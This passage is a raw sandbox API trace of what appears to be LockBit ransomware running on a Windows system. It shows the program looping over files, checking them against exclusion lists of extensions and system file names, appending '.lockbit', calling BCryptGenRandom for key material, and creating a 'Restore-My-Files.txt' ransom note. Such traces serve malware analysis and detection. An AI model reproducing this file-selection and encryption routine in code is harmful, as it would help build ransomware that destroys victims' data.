lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.297] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00078_.WMF") returned 1 [0109.298] lstrcmpiW (lpString1="ntldr", lpString2="BS00078_.WMF") returned 1 [0109.298] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00078_.WMF") returned 1 [0109.298] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00078_.WMF") returned -1 [0109.298] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00078_.WMF") returned -1 [0109.298] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00078_.WMF") returned 1 [0109.298] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00078_.WMF") returned 1 [0109.298] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.298] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned=".WMF" [0109.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.298] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.298] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.299] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.299] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.lockbit") returned 72 [0109.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.301] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.301] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.301] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1444) returned 1 [0109.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.302] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.302] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.302] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.308] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.308] malloc (_Size=0xa6) returned 0x77d800 [0109.308] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.308] free (_Block=0x77d800) [0109.308] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.308] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.309] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6395c300, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6395c300, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f26, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00092_.WMF", cAlternateFileName="")) returned 1 [0109.309] lstrcmpiW (lpString1=".", lpString2="BS00092_.WMF") returned -1 [0109.309] lstrcmpiW (lpString1="..", lpString2="BS00092_.WMF") returned -1 [0109.309] PathFindExtensionW (pszPath="BS00092_.WMF") returned=".WMF" [0109.309] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.309] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.310] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.310] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00092_.WMF") returned 1 [0109.310] lstrcmpiW (lpString1="ntldr", lpString2="BS00092_.WMF") returned 1 [0109.310] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00092_.WMF") returned 1 [0109.310] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00092_.WMF") returned -1 [0109.310] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00092_.WMF") returned -1 [0109.310] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00092_.WMF") returned 1 [0109.310] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00092_.WMF") returned 1 [0109.311] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.311] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned=".WMF" [0109.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.311] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.311] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.312] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.312] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.312] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.312] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.312] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.312] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.lockbit") returned 72 [0109.312] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.313] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.313] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.313] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7974) returned 1 [0109.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.314] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.329] malloc (_Size=0xa6) returned 0x77d800 [0109.329] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.329] free (_Block=0x77d800) [0109.329] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.329] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.329] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60023c00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60023c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00100_.WMF", cAlternateFileName="")) returned 1 [0109.329] lstrcmpiW (lpString1=".", lpString2="BS00100_.WMF") returned -1 [0109.329] lstrcmpiW (lpString1="..", lpString2="BS00100_.WMF") returned -1 [0109.329] PathFindExtensionW (pszPath="BS00100_.WMF") returned=".WMF" [0109.329] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.329] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.329] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.329] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.329] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.330] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.330] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00100_.WMF") returned 1 [0109.331] lstrcmpiW (lpString1="ntldr", lpString2="BS00100_.WMF") returned 1 [0109.331] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00100_.WMF") returned 1 [0109.331] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00100_.WMF") returned -1 [0109.331] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00100_.WMF") returned -1 [0109.331] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00100_.WMF") returned 1 [0109.331] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00100_.WMF") returned 1 [0109.331] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.331] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned=".WMF" [0109.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.332] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.332] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.332] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.lockbit") returned 72 [0109.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), 